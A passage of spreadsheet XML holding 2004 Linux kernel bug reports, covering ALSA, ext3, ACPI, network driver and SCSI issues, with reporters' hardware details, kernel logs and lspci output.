    <t>2005-07-05 10:58 UTC</t>
  </si>
  <si>
    <t>See http://www.ussg.iu.edu/hypermail/linux/kernel/0403.2/0084.html 2.6.5-r1 uses SNDRV_DMA_TYPE_PCI where it should be SNDRV_DMA_TYPE_DEV. sed -i 's/SNDRV_DMA_TYPE_PCI/SNDRV_DMA_TYPE_DEV/g' include/sound/trident.h sound/isa/cs423x/cs4231_lib.c sound/sparc/cs4231.c sound/parisc/harmony.c /usr/src/linux $ grep -R SNDRV_DMA_TYPE_PCI . ./include/sound/trident.h:#define TRIDENT_DMA_TYPE SNDRV_DMA_TYPE_PCI_16MB ./include/sound/trident.h:#define TRIDENT_DMA_TYPE SNDRV_DMA_TYPE_PCI ./sound/isa/cs423x/cs4231_lib.c: snd_pcm_lib_preallocate_pages_for_all(pcm, SNDRV_DMA_TYPE_PCI, ./sound/sparc/cs4231.c: snd_pcm_lib_preallocate_pages_for_all(pcm, SNDRV_DMA_TYPE_PCI, ./sound/parisc/harmony.c: harmony-&gt;dma_dev.type = SNDRV_DMA_TYPE_PCI;</t>
  </si>
  <si>
    <t>scheduling and maybe disk-io/cache flushing problem with ext3</t>
  </si>
  <si>
    <t>2004-04-09 07:38 UTC</t>
  </si>
  <si>
    <t>2004-05-15 01:51 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian 'sarge' Hardware Environment: Thunderbird 1.3 GHz, 256 MB RAM Software Environment: console/X11 Problem Description: This seems to be a rather diffuse problem: 1. Some weird 'hangs' of various programs. I think these programs stopped beeing scheduled for 10 sec to 5 min. This is not very reproducible but it often occurs while using debians dselect, apt-get, dpkg or other high-load tasks. 2. A very strange problem with nvidias kernel module and maybe with other kernel modules. After installing the nvidia module using the nvidia-installer, everething is fine. The kernel module 'nvidia.ko' is present in /lib/modules/2.6.5/kernel/drivers/video, size is round about 2 MB. After rebooting, nvidia.ko is completly overwritten with '.' ! My filesystem is ext3 and denoted as "clean" by e2fsck. Maybe the same kind of problem made two ALSA-OSS emulation modules unloadable. After reinstalling them they're fine. Steps to reproduce: Only the problem with the overwritten nvidia.ko is 100% reproduceible. Even when booting 2.6.4 after installing the nvidia driver running kernel 2.6.5 the file is destroyed. Maybe there's a problem with cache flushing in 2.6.5? Note: This problems only occur when using 2.6.5, 2.6.2/3/4 are fine. Thanks, Michael</t>
  </si>
  <si>
    <t>no notify event when ac goes off-line or comes on-line</t>
  </si>
  <si>
    <t>2004-04-09 21:11 UTC</t>
  </si>
  <si>
    <t>Ronald Tschal</t>
  </si>
  <si>
    <t>2004-07-07 12:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake 10.0 community, with 2.6.3 kernel Hardware Environment: Laptop, Uniwill N251C1 Software Environment: ACPI version 20040211 Problem Description: When the AC is unplugged or plugged back in no notify event is generated (i.e. nothing appears on /proc/acpi/event); however, /proc/acpi/ac_adapter/AC0/state is correctly updated. I recompiled the kernel with CONFIG_ACPI_DEBUG=y, and then set the debug-layer to 0xC6 and the debug-level to 0xFFFFF; the result from unplugging and plugging in is attached. Steps to reproduce: Unplug AC, plug AC in.</t>
  </si>
  <si>
    <t>3c905C won't do faster than 10bT HD</t>
  </si>
  <si>
    <t>2004-04-10 06:42 UTC</t>
  </si>
  <si>
    <t>2004-05-12 08:47 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: SMP x86, Intel 440FX Software Environment: gcc version 2.95.4 Problem Description: With the 2.6 series (2.6.0 and 2.6.5 tested) my 3c905c NIC won't do better than 10bT half-duplex. This is shown by poor tranfer speeds, and speed setting confirmed with mii-tool. Trying to force 100bT full-duplex with mii-tool in 2.6 fails. However, the LEDs on the back of NIC indicate 100bT, as to the lights on the switch. With 2.4, this same setup gives 100bT FD, as expected. 2.6 config: CONFIG_NET_ETHERNET=y CONFIG_MII=y CONFIG_NET_VENDOR_3COM=y CONFIG_VORTEX=y CONFIG_NET_PCI=y 2.4.21-rc2 3c59x: Donald Becker and others. www.scyld.com/network/vortex.html See Documentation/networking/vortex.txt 00:14.0: 3Com PCI 3c905C Tornado at 0xfc00. Vers LK1.1.16 00:01:03:2a:30:0a, IRQ 11 product code 4a45 rev 00.12 date 10-17-00 Internal config register is 1800000, transceivers 0xa. 8K byte-wide RAM 5:3 Rx:Tx split, autoselect/Autonegotiate interface. MII transceiver found at address 24, status 786d. Enabling bus-master transmits and whole-frame receives. 00:14.0: scatter/gather enabled. h/w checksums enabled dual266:~# mii-tool eth0: negotiated 100baseTx-FD flow-control, link ok 00:14.0 Ethernet controller: 3Com Corporation 3c905C-TX/TX-M [Tornado] (rev 30) tranfer 50mb in 13.3 seconds However, under 2.6.0/2.6.5 3c59x: Donald Becker and others. www.scyld.com/network/vortex.html 0000:00:14.0: 3Com PCI 3c905C Tornado at 0xfc00. Vers LK1.1.19 Tranfer speeds are about 600k/sec. Other people have reported this same issue: see http://marc.theaimsgroup.com/?l=linux-netdev&amp;m=108124368304177&amp;w=2</t>
  </si>
  <si>
    <t>ACPI_BOOT should be disablable even if SMP is selected</t>
  </si>
  <si>
    <t>2.4.25, 2.6.4</t>
  </si>
  <si>
    <t>2004-04-11 15:50 UTC</t>
  </si>
  <si>
    <t>Charles Duffy</t>
  </si>
  <si>
    <t>2005-10-17 13:11 UTC</t>
  </si>
  <si>
    <t>Distribution: RHAS Hardware Environment: Hitachi HA8000/70 Software Environment: kernel.org kernel Problem Description: This hardware oopses on boot (due to a DSDT bug) if ACPI_BOOT is selected -- but ACPI_BOOT is forced to be enabled if SMP is on, even though the hardware works fine in SMP mode with ACPI_BOOT forcably turned off (and direct PCI bus configuration enabled). The kernel configuration tool should provide the ability to turn ACPI_BOOT off even on a SMP build. Steps to reproduce: Run "make menuconfig". Completely disable ACPI, enable SMP, select direct PCI bus configuration, exit and save, examine .config, notice that CONFIG_ACPI_BOOT is still enabled.</t>
  </si>
  <si>
    <t>Forcedeth - no link during initialization</t>
  </si>
  <si>
    <t>2004-04-12 11:01 UTC</t>
  </si>
  <si>
    <t>Jor</t>
  </si>
  <si>
    <t>2004-10-28 09:04 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: AMD XP 1800+, MSI K7N420 PRO(MS-6373), nForce 420-D/MCP-D Software Environment: 'Vanilla' Linux kernel 2.6.5 Problem Description: Loading the forcedeth module works, but after bringing up the device, it doesn't work at all. Kernel log messages report "no link during initialization", see full log below. The network device works in the 'other' OS, though after trying the linux driver and rebooting to it also makes it fail in that OS. Only after a full power down, then starting up does it work again in the other OS. But Linux forcedeth driver never does. Steps to reproduce: modprobe forcedeth ifup eth0 (ifup the debian command, manually using ifconfig results in the same) Normal Kernel log output: forcedeth.c: Reverse Engineered nForce ethernet driver. Version 0.23. PCI: Setting latency timer of device 0000:00:04.0 to 64 eth0: forcedeth.c: subsystem: 01462:373c bound to 0000:00:04.0 eth0: no link during initialization. With 'debug' enabled and recompiled: Apr 12 18:48:25 hps kernel: forcedeth.c: Reverse Engineered nForce ethernet driver. Version 0.25. Apr 12 18:48:25 hps kernel: PCI: Setting latency timer of device 0000:00:04.0 to 64 Apr 12 18:48:25 hps kernel: 0000:00:04.0: resource 0 start e4081000 len 1024 flags 0x00000200. Apr 12 18:48:25 hps kernel: 0000:00:04.0: MAC Address 00:10:dc:25:7a:ed Apr 12 18:48:25 hps kernel: eth0: forcedeth.c: subsystem: 01462:373c bound to 0000:00:04.0 Apr 12 18:49:10 hps kernel: nv_open: begin Apr 12 18:49:10 hps kernel: eth0: nv_txrx_reset Apr 12 18:49:10 hps kernel: eth0: nv_alloc_rx: Packet 0 marked as Available Apr 12 18:49:10 hps kernel: eth0: nv_alloc_rx: Packet 1 marked as Available ...lots more of these.... Apr 12 18:49:10 hps kernel: eth0: nv_alloc_rx: Packet 127 marked as Available Apr 12 18:49:10 hps kernel: eth0: mii_rw read from reg 2 at PHY 1: 0x15. Apr 12 18:49:10 hps kernel: eth0: mii_rw read from reg 3 at PHY 1: 0xf441. Apr 12 18:49:10 hps kernel: eth0: open: Found PHY 0015:f441 at address 1. Apr 12 18:49:10 hps kernel: eth0: mii_rw read from reg 4 at PHY 1: 0x1e1. Apr 12 18:49:10 hps kernel: eth0: mii_rw read from reg 5 at PHY 1: 0x0. Apr 12 18:49:10 hps kernel: eth0: nv_update_linkspeed: PHY advertises 0x01e1, lpa 0x0000. Apr 12 18:49:10 hps kernel: eth0: bad ability 0000 - falling back to 10HD. Apr 12 18:49:10 hps kernel: eth0: nv_start_rx Apr 12 18:49:10 hps kernel: eth0: nv_start_tx Apr 12 18:49:10 hps kernel: eth0: mii_rw read from reg 1 at PHY 1: 0x0. Apr 12 18:49:10 hps kernel: eth0: no link during initialization. Apr 12 18:49:10 hps kernel: eth0: nv_stop_rx Apr 12 18:49:10 hps kernel: eth0: nv_start_rx ....bunch of the same.... Apr 12 18:49:10 hps kernel: eth0: nv_nic_irq Apr 12 18:49:10 hps kernel: eth0: irq: 00000020 Apr 12 18:49:10 hps kernel: eth0: irq: 00000000 Apr 12 18:49:10 hps kernel: eth0: nv_nic_irq complete ...these last one continue forever untill unloading the module again... lspci -vvv: 00:00.0 Host bridge: nVidia Corporation nForce CPU bridge (rev b2) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=32M] Capabilities: [40] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=x1 Capabilities: [60] #08 [2001] 00:00.1 RAM memory: nVidia Corporation nForce 220/420 Memory Controller (rev b2) Subsystem: Micro-Star International Co., Ltd.: Unknown device 3730 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:00.2 RAM memory: nVidia Corporation nForce 220/420 Memory Controller (rev b2) Subsystem: Micro-Star International Co., Ltd.: Unknown device 3730 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:00.3 RAM memory: nVidia Corporation nForce 420 Memory Controller (DDR) (rev b2) Subsystem: Micro-Star International Co., Ltd.: Unknown device 3730 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:01.0 ISA bridge: nVidia Corporation nForce ISA Bridge (rev c3) Subsystem: Micro-Star International Co., Ltd.: Unknown device 3730 Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [50] #08 [01e1] 00:01.1 SMBus: nVidia Corporation nForce PCI System Management (rev c1) Subsystem: Micro-Star International Co., Ltd.: Unknown device 3730 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at 5000 [size=16] Region 1: I/O ports at 5020 [size=16] Region 2: I/O ports at 6000 [size=32] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:02.0 USB Controller: nVidia Corporation nForce USB Controller (rev c3) (prog-if 10 [OHCI]) Subsystem: Micro-Star International Co., Ltd.: Unknown device 3730 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin A routed to IRQ 5 Region 0: Memory at e4082000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:03.0 USB Controller: nVidia Corporation nForce USB Controller (rev c3) (prog-if 10 [OHCI]) Subsystem: Micro-Star International Co., Ltd.: Unknown device 3730 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin A routed to IRQ 12 Region 0: Memory at e4080000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:04.0 Ethernet controller: nVidia Corporation nForce Ethernet Controller (rev c2) Subsystem: Micro-Star International Co., Ltd.: Unknown device 373c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (250ns min, 5000ns max) Interrupt: pin A routed to IRQ 11 Region 0: Memory at e4081000 (32-bit, non-prefetchable) [size=1K] Region 1: I/O ports at d800 [size=8] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable+ DSel=0 DScale=0 PME- 00:05.0 Multimedia audio controller: nVidia Corporation: Unknown device 01b0 (rev c2) Subsystem: Micro-Star International Co., Ltd.: Unknown device 3730 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (250ns min, 3000ns max) Interrupt: pin A routed to IRQ 5 Region 0: Memory at e4000000 (32-bit, non-prefetchable) [size=512K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:06.0 Multimedia audio controller: nVidia Corporation nForce Audio (rev c2) Subsystem: Micro-Star International Co., Ltd.: Unknown device 3730 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (500ns min, 1250ns max) Interrupt: pin A routed to IRQ 12 Region 0: I/O ports at dc00 [size=256] Region 1: I/O ports at e000 [size=128] Region 2: Memory at e4083000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:08.0 PCI bridge: nVidia Corporation nForce PCI-to-PCI bridge (rev c2) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 I/O behind bridge: 0000c000-0000cfff Memory behind bridge: b0000000-cfffffff Prefetchable memory behind bridge: d0000000-d7ffffff BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- 00:09.0 IDE interface: nVidia Corporation nForce IDE (rev c3) (prog-if 8a [Master SecP PriP]) Subsystem: Micro-Star International Co., Ltd.: Unknown device 3730 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Region 4: I/O ports at e800 [size=16] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:1e.0 PCI bridge: nVidia Corporation nForce AGP to PCI Bridge (rev b2) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 99 Bus: primary=00, secondary=02, subordinate=02, sec-latency=32 I/O behind bridge: 0000f000-00000fff Memory behind bridge: e2000000-e3ffffff Prefetchable memory behind bridge: d8000000-dfffffff BridgeCtl: Parity- SERR+ NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- 01:01.0 VGA compatible controller: ATI Technologies Inc Radeon RV100 QY [Radeon 7000/VE] (prog-if 00 [VGA]) Subsystem: PC Partner Limited: Unknown device 7c02 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (2000ns min), Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 11 Region 0: Memory at d0000000 (32-bit, prefetchable) [size=128M] Region 1: I/O ports at c000 [size=256] Region 2: Memory at c1000000 (32-bit, non-prefetchable) [size=64K] Expansion ROM at &lt;unassigned&gt; [disabled] [size=128K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:03.0 Network controller: Eicon Technology Corporation Diva Pro 2.0 S/T (rev 01) Subsystem: Eicon Technology Corporation Diva Pro 2.0 S/T Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin A routed to IRQ 12 Region 0: Memory at c1010000 (32-bit, non-prefetchable) [size=128] Region 1: I/O ports at c400 [size=128] Region 2: I/O ports at c800 [size=32] 02:00.0 VGA compatible controller: nVidia Corporation NVCrush11 [GeForce2 MX Integrated Graphics] (rev b1) (prog-if 00 [VGA]) Subsystem: Micro-Star International Co., Ltd.: Unknown device 3738 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 5 Region 0: Memory at e2000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at d8000000 (32-bit, prefetchable) [size=128M] Expansion ROM at &lt;unassigned&gt; [disabled] [size=64K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [44] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA- ITACoh- GART64- HTrans- 64bit- FW+ AGP3- Rate=x1,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt;</t>
  </si>
  <si>
    <t>AMD Elan sc520 watchdog does not work on TS-5500</t>
  </si>
  <si>
    <t>2004-04-12 11:22 UTC</t>
  </si>
  <si>
    <t>Sean Young</t>
  </si>
  <si>
    <t>2004-06-16 12:45 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian stable (woody) Hardware Environment: AMD Elan SC520 (Technologic Systems TS-5500 board) Problem Description: The hardware watchdog does not work. open/write/close work fine, but the machine never reboots when it should. tiger:~# modprobe sc520_wdt sc520_wdt: CBAR: 0x000df000 sc520_wdt: !!! WARNING !!! MMCR Aliasing found NOT enabled! Using default value of: 000ffffe This has not been tested! Please email Scott Jennings &lt;smj@oro.net&gt; and Bill Jennings &lt;bj@oro.net&gt; if it works! sc520_wdt: WDT driver for SC520 initialised. timeout=30 sec (nowayout=0) tiger:~# See drivers/char/watchdog/sc520_wdt.c MMCR aliasing is indeed disabled on this board. The MMCR is always accessable at 0xfffef000, whether MMCR aliasing is enabled or not. The default should be 0xfffef000 (even though it is commented out). I have no idea where 0x000ffffe came from. The MMCR is aligned on a 4kb boundary. IMHO the best solution is to get rid of the code which uses CBAR (which only exists for compatiblity with old OSes) and to just default to 0xfffef000. That will always work. I've emailed the two email addresses in the warning but never got a response.</t>
  </si>
  <si>
    <t>poweroff on boot if kernel &gt;2.6.0-test9 - Asus laptop</t>
  </si>
  <si>
    <t>&gt; 2.6.0-test9</t>
  </si>
  <si>
    <t>2004-04-13 06:17 UTC</t>
  </si>
  <si>
    <t>matteo battistini</t>
  </si>
  <si>
    <t>2004-10-24 12:49 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: ASUS L3500Tp 0000:00:00.0 Host bridge: Silicon Integrated Systems [SiS] 650/M650 Host (rev 01) Subsystem: Asustek Computer, Inc.: Unknown device 8078 Flags: bus master, medium devsel, latency 32 Memory at ec000000 (32-bit, non-prefetchable) Capabilities: [c0] AGP version 2.0 0000:00:01.0 PCI bridge: Silicon Integrated Systems [SiS] Virtual PCI-to-PCI bridge (AGP) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: eb800000-ebffffff Prefetchable memory behind bridge: f0000000-febfffff Expansion ROM at 0000d000 [disabled] [size=4K] 0000:00:02.0 ISA bridge: Silicon Integrated Systems [SiS] SiS85C503/5513 (LPC Bridge) (rev 10) Flags: bus master, medium devsel, latency 0 0000:00:02.1 SMBus: Silicon Integrated Systems [SiS]: Unknown device 0016 Flags: medium devsel, IRQ 9 I/O ports at e800 [size=32] 0000:00:02.2 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 07) (prog-if 10 [OHCI]) Subsystem: Asustek Computer, Inc.: Unknown device 1699 Flags: bus master, medium devsel, latency 32, IRQ 11 Memory at eb000000 (32-bit, non-prefetchable) 0000:00:02.3 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 07) (prog-if 10 [OHCI]) Subsystem: Asustek Computer, Inc.: Unknown device 1699 Flags: bus master, medium devsel, latency 32, IRQ 11 Memory at ea800000 (32-bit, non-prefetchable) 0000:00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (rev d0) (prog-if 80 [Master]) Subsystem: Asustek Computer, Inc.: Unknown device 1698 Flags: bus master, fast devsel, latency 128 I/O ports at b800 [size=16] 0000:00:02.6 Modem: Silicon Integrated Systems [SiS] AC'97 Modem Controller (rev a0) (prog-if 00 [Generic]) Subsystem: Asustek Computer, Inc.: Unknown device 1696 Flags: medium devsel, IRQ 5 I/O ports at b400 I/O ports at b000 [size=128] Capabilities: [48] Power Management version 2 0000:00:02.7 Multimedia audio controller: Silicon Integrated Systems [SiS] Sound Controller (rev a0) Subsystem: Asustek Computer, Inc.: Unknown device 1663 Flags: bus master, medium devsel, latency 32, IRQ 5 I/O ports at a800 I/O ports at a400 [size=128] Capabilities: [48] Power Management version 2 0000:00:0a.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev a8) Subsystem: Asustek Computer, Inc.: Unknown device 1697 Flags: bus master, medium devsel, latency 168, IRQ 9 Memory at 1e000000 (32-bit, non-prefetchable) Bus: primary=00, secondary=02, subordinate=05, sec-latency=176 Memory window 0: 1e400000-1e7ff000 (prefetchable) Memory window 1: 1e800000-1ebff000 I/O window 0: 00004000-000040ff I/O window 1: 00004400-000044ff 16-bit legacy interface ports at 0001 0000:00:0a.1 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev a8) Subsystem: Asustek Computer, Inc.: Unknown device 1697 Flags: bus master, medium devsel, latency 168, IRQ 5 Memory at 1e001000 (32-bit, non-prefetchable) Bus: primary=00, secondary=06, subordinate=09, sec-latency=176 Memory window 0: 1ec00000-1efff000 (prefetchable) Memory window 1: 1f000000-1f3ff000 I/O window 0: 00004800-000048ff I/O window 1: 00004c00-00004cff 16-bit legacy interface ports at 0001 0000:00:0a.2 FireWire (IEEE 1394): Ricoh Co Ltd R5C552 IEEE 1394 Controller (prog-if 10 [OHCI]) Subsystem: Asustek Computer, Inc.: Unknown device 1697 Flags: bus master, medium devsel, latency 32, IRQ 9 Memory at ea000000 (32-bit, non-prefetchable) Capabilities: [dc] Power Management version 2 0000:00:0d.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Subsystem: Asustek Computer, Inc.: Unknown device 1045 Flags: bus master, medium devsel, latency 32, IRQ 11 I/O ports at a000 Memory at e9800000 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 0000:01:00.0 VGA compatible controller: Silicon Integrated Systems [SiS] 65x/M650/740 PCI/AGP VGA Display Adapter (prog-if 00 [VGA]) Subsystem: Asustek Computer, Inc.: Unknown device 1612 Flags: 66MHz, medium devsel, IRQ 9 BIST result: 00 Memory at f0000000 (32-bit, prefetchable) Memory at eb800000 (32-bit, non-prefetchable) [size=128K] I/O ports at d800 [size=128] Capabilities: [40] Power Management version 1 Capabilities: [50] AGP version 2.0 Software Environment: ii acpid 1.0.3-14 Utilities for using ACPI power management i use debian sid updated every day Problem Description: when i boot, the fan of my laptop start noisily and if i load acpi modules for control that problem, my laptop switch off (like without electricity) Steps to reproduce: i've tryed all the kernel &gt;2.6.0-test9 and every time i had the same problem at boot time my laptop overheat and when i load modules (acpi modules), it switch off like whithout electricity(if the modules are already loaded i can't do something, it switch off)</t>
  </si>
  <si>
    <t>_SxD support uses wrong flags</t>
  </si>
  <si>
    <t>any</t>
  </si>
  <si>
    <t>2004-04-14 09:58 UTC</t>
  </si>
  <si>
    <t>The cut/paste programming of _SxD support is incomplete. This patch fixes it.</t>
  </si>
  <si>
    <t>ACPI to have its own thread for SCI Notification callback's</t>
  </si>
  <si>
    <t>2004-04-15 10:12 UTC</t>
  </si>
  <si>
    <t>2004-11-03 17:46 UTC</t>
  </si>
  <si>
    <t>acpi_config-hotplug</t>
  </si>
  <si>
    <t>1171 2622</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: 2.6.5-rc2 Problem Description: If acpi uses keventd thread by callind schedule_work() then higher level driver like processor drivers can not call schedule_work() and wait for it to execute. Also acpi having its own thread simplifies lot of things for future CPU/Memory/IO hotplug implementations. Steps to reproduce:</t>
  </si>
  <si>
    <t>aic7xxx hangs system</t>
  </si>
  <si>
    <t>2.4.26 and 2.6.5</t>
  </si>
  <si>
    <t>2004-04-15 13:05 UTC</t>
  </si>
  <si>
    <t>David Johnson</t>
  </si>
  <si>
    <t>2004-10-26 06:27 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: DEC Alphastation 255/300 (Avanti CPU) Software Environment: gcc 3.3.3 (Debian 20040401) Problem Description: Upon booting, the driver hangs the system when it should be looking for devices. I am unable to test whether this is Alpha-specific or not. 2.4.24 does not have this problem; I haven't had time to test 2.4.25 yet. I also experience this bug with 2.6.5 (new driver) but I think this is a known problem on 2.6? I'll try to provide whatever information is needed.</t>
  </si>
  <si>
    <t>interrupt source override ineffective - ES7000</t>
  </si>
  <si>
    <t>2004-04-15 21:35 UTC</t>
  </si>
  <si>
    <t>2004-05-11 23:27 UTC</t>
  </si>
  <si>
